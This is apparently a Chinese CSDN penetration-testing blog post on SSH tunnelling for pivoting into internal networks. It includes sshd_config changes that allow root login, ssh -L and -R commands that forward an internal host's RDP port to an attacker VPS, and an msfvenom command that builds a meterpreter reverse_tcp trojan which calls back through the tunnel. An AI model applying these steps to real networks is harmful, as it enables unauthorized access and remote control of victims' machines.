ssh 指定端口_SSH隧道端口转发详解

最新推荐文章于 2024-05-13 11:04:15 发布
最新推荐文章于 2024-05-13 11:04:15 发布
阅读量943 收藏 1
点赞数
文章标签: ssh 指定端口 ssh 端口

一、SSH配置文件设置

需要在目标主机修改如下配置文件内容:

Vi /etc/ssh/sshd_config   #SSH配置文件AllowTcpForwarding yes     #是否允许转发TCP协议GatewayPorts yes   #是否允许远程主机连接本地转发端口PermitRootLogin yes    #是否允许root登录PasswordAuthentication yes    #是否允许使用基于密码的认证TCPKeepAlive yes    #保持心跳,防止 ssh 断开

二、SSH端口转发参数详解

-C   #压缩传输,加快传输速度-f    #将SSH转入后台执行,不占用当前的shell-N   #建立静默连接(建立了连接,但是看不到具体会话)-g   #允许远程主机连接到本地用于转发的端口-L   #本地端口转发-R   #远程端口转发-D  #动态转发(socks代理)-P  #指定SSH端口

三、具体转发方式

①本地端口转发(将攻击者vps的某个端口转发到目标指定机器的指定端口)

场景:只能访问B主机,B作为跳板,将内网C主机端口带出来

在vps上执行:

ssh -L vps本地端口:C主机ip:C端口 B用户名@ip

实例:

ssh -CfNg –L 2121:192.168.1.109:3389 root@192.168.1.2

29b891a31edf634b3b1aca0b4a08973f.png

此时连接vps本地2121端口就相当于连接到内网C主机的3389端口

7d3d846ae1951bcf25d0e32e356ae593.png

②远程端口转发(将目标主机的某个端口转发到攻击者vps的指定端口)

场景:无法访问B主机,但是B主机可以出网,通过B为跳板,将内网C主机端口带出来

在B跳板上执行:

ssh -R vps端口:C主机ip:C端口 vps用户名@ip

实例:

ssh -CfNg -R 1080:192.168.1.109:3389 root@192.168.1.106

b3843dfe5f1d31ad730886460da89b13.png

此时连接vps本地1080端口就相当于连接到内网C主机的3389端口

-f1c71b4e9c1905b861929c33e698b20f.png

四、如何通过跳板机让内网主机上线?

①通过本地端口转发

场景:(B跳板机能出网,内网C主机能访问B跳板,内网其他主机怎么全部上线呢?)

C主机执行:

ssh -CfNg -L 本地端口:vps的ip:vps端口 B用户名@ip

88bec77e6a1e1701363aa665b4ce8ee3.png

然后MSF生成木马(lhost=C主机ip,lport=C主机端口):

msfvenom -p windows/meterpreter/reverse_tcp lhost=C主机ip lport=C主机端口 -f exe > ssh.exe

79066d68f7002be78ef4e119a208995a.png

然后vps开启MSF监听(vps本地端口和ip即可):

4012cb4006f64fe08f5745db1224c0c1.png

内网中的主机执行payload就能成功上线:

流量走向:C主机6666端口-->B跳板-->vps的6666端口

41694a4db1ec0ee608e17731fac79141.png

②通过远程端口转发

场景:(B跳板机能出网,内网C主机能访问B跳板,内网其他主机怎么全部上线呢?)

B跳板执行:

ssh –CfNg -R C主机端口:vps的ip:vps的端口 C主机用户名@ip

547b0b851f130308a06b96a508825bc6.png

然后MSF生成木马(lhost=C主机ip,lport=C主机端口):

9b3ea0461daac966ffd55a9db288cd7f.png

然后vps开启MSF监听(vps本地端口和ip即可):

fe928a2abbf8ce72d3bed1bae6f61e0d.png

执行payload就能成功上线

流量走向:C主机7777端口-->B跳板-->vps的4444端口

b0f289c0d3a086b0211ce2e95d4946e2.png

文章只是模拟部分场景,总体来说SSH隧道还是挺稳定的,实际场景还需根据实际情况进行思路拓展,文章如有错误,欢迎一起交流

weixin_39816141
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
修改ssh端口
03-12
适合于CentOS和RHEL,下载后给其权限,运行就可以一键改变ssh端口
SSH端口转发,本地端口转发,远程端口转发,动态端口转发详解
01-10
第一部分 SSH端口转发概述 当你在咖啡馆享受免费 WiFi 的时候,有没有想到可能有人正在窃取你的密码及隐私信息?当你发现实验室的防火墙阻止了你的网络应用端口,是不是有苦难言?来看看 SSH端口转发功能能给...
SSH连接中指定端口号,可以通过在SSH命令中使用“-p“参数来指定端口
BLOG域名:programb.blog.csdn.net
03-30 2360
这将显示出所有正在监听的TCP和UDP端口,并过滤出包含"ssh"关键字的行,从而找到正在监听的SSH连接端口号。在SSH连接中指定端口号,可以通过在SSH命令中使用"-p"参数来指定端口号。其中,"username"是你的用户名,"hostname"是你要连接的主机名或IP地址。请注意,如果你更改了SSH服务器的默认端口号,你需要确保在连接时使用正确的端口号。文件中查找包含"Port"关键字的行,并显示出当前配置的SSH连接端口号。在Linux系统中,有多种方法可以查看正在监听的端口号,比如使用。
【渗透测试笔记】之【内网渗透——应用层隧道SSH隧道的使用:本地、远程端口转发
最新发布
2401_84970250的博客
05-13 622
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
linux ssh自定义端口
学亮编程手记
02-25 720
在使用SSH(Secure Shell)连接远程服务器时,如果目标服务器的SSH服务运行在非默认端口上(默认端口号是22),你需要在命令行中明确指定所使用的端口号。这样,SSH客户端就会尝试通过1234端口与远程服务器建立安全的加密连接。例如,如果你需要通过端口号1234连接到远程服务器,用户名为。选项,然后跟上要连接的端口号。
ssh端口登录
热门推荐
IChen.的博客
03-29 1万+
ssh -p 端口号 root@ip
SSH端口转发之本地转发
weixin_34261739的博客
06-20 266
一、案例环境: 3台RHEL6.5 64虚拟机(分别为:HostA、HostB、HostC) IP地址: HostA:192.168.100.101 HostB:192.168.100.102 HostC:192.168.100.103 角色: 外网主机:HostA 内网堡垒机:HostB 内网服务器:HostC 二、需求: 前提条件:HostB:开启ssh远程访问,Host...
SSH远程登录和端口转发详解
09-15
SSH(Secure Shell)是一种网络协议,用于在不安全的网络上提供安全的远程登录和其他网络服务。SSH协议基于应用层和传输层,旨在确保...同时,端口转发功能允许用户安全地通过SSH隧道访问受限制或不安全网络上的服务。
SSH如何实现本地远程端口转发
10-18
SSH 本地远程端口转发详解 SSH(Secure Shell)是一种安全的远程登录协议,提供了强大的远程访问和隧道功能。本文将详细介绍如何使用 SSH 实现本地远程端口转发,并提供了详细的配置步骤和示例。 一、什么是 SSH ...
ssh 指定端口_ssh反向代理
weixin_39980575的博客
12-09 432
一些服务器只能登录上网,因网络安全没有 port 访问进去,通常大家想到的是QQ远程协助之类的,实际上能上网就能做一切。SSH反向代理即可搞定一切, ssh先登录到远程服务器上,并登录时配置好反向代理,这样即可通过反向代理从远程机访问回机器。正向代理大家可能使用得挺多:ssh -fCNL ,就不用多说了。反向代理:ssh-fCNR[B机器IP或省略]:[B机器端口]:[A机器的IP]:[A机器端...
ssh时怎么同时指定端口号,以及scp文件到远程的指定端口
qq_40467670的博客
12-14 3139
如果我要将本地文件 /path/to/local/file.txt 复制到远程主机 example.com 的 /path/to/remote/ 路径下,并使用自定义的端口号 12345,我该怎么做?如果想要通过 SSH 连接到指定端口的远程服务器,可以在 SSH 命令中使用 -p 或 --port 参数来指定端口号。在执行命令时,系统会要求输入远程主机的密码(如果使用密码进行身份验证)。其中, 是要连接的端口号,user 是远程服务器上的用户名,host 是远程服务器的地址或 IP。
ssh 远程登陆指定端口
IChen.的博客
10-14 9916
ssh指定端口 ssh -p xxx user@ip xxx --为 端口号 user --为用户名 ip --为要登陆的ip
centos8 ssh配置_如何建立一个足够安全的SSH连接?
weixin_39977642的博客
11-26 606
1 概述 使用SSH连接服务器是一件很平常的事,但是,连接是否足够安全是一个令人担忧的问题。本文从如下几个方面介绍了如何建立一个足够安全的SSH连接:端口协议用户密码密钥对ssh-agent2 端口第一步就是修改默认端口22,修改/etc/ssh/sshd_config中的Port即可,比如这里修改为1234端口:1234注意这里需要配合SELinu添加端口,否则不能启动sshd服务,在CentO...
ssh远程到主机指定端口
sinat_34863938的博客
01-27 1万+
mac工具:自带终端、iterm2、SecureCRT windows工具:xshell或其他shell工具 第一种情况(没做端口映射): 命令:ssh 用户名@主机ip 端口号 例子:比如要远程到主机22.22.22.22的12345端口,命令为 ssh root@22.22.22.22 12345 第二种情况(做了端口映射): 命令:ssh 用户名@主机ip -p 映射的端口号 例子:比如要远程到主机22.22.22.22的12345端口,但是12345端口被映射到了54321端口,所以要访问12345
ssh连接命令的指定端口位置的影响
weixin_45504248的博客
05-23 616
一共四条ssh连接命令,第2、3条把 -p 放在地址后面,第2条出错了,其余均正常。总结:有些情况需要把端口指定放在地址前才生效,可以当成习惯。ps:第二条是我连接termux的opensshssh连接命令的指定端口位置影响。
ssh使用指定端口登陆服务器
wo_CEO的博客
09-21 1147
ssh 用户名@ip 端口 例如 ssh root@10.0.1.1 1022
ssh中添加隧道,访问目标机器上的地址
涂作权的博客
04-23 386
网络结构如下: 注意:下面的跳板机可以通过curl -lv http://targetIp:port 访问到页面。 配置案例: 接着在本地的浏览器上输入:http://localhost:20000/,可以看到: 说明该配置成功了。
SSH命令
AF黑眼圈患者的博客
03-27 3772
如果你的客户端有多于两个以上的 IP 地址,你就不可能分得清楚在使用哪一个 IP 连接到 SSH 服务器。为了解决这种情况,我们可以使用 -b 选项来指定一个IP 地址。SSH 提供的 -v 选项参数正是为此而设的。使用 ssh-keygen -t +算法 ,现在大多数都使用rsa或者dsa算法。使用 -C 选项,所有通过 SSH 发送或接收的数据将会被压缩,并且任然是加密的。SSH 默认连接到目标主机的 22 端口上,可以使用-p选项指定端口号。使用ssh的-X选项,然后主机就会开启 X11 转发功能。
玩转SSH端口转发
weixin_33827965的博客
04-24 387
SSH有三种端口转发模式,本地端口转发(Local Port Forwarding),远程端口转发(Local Port Forwarding)以及动态端口转发(Dynamic Port Forwarding)。对于本地/远程端口转发,两者的方向恰好相反。动态端口转发则可以用于科学上网。 SSH端口转发也被称...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值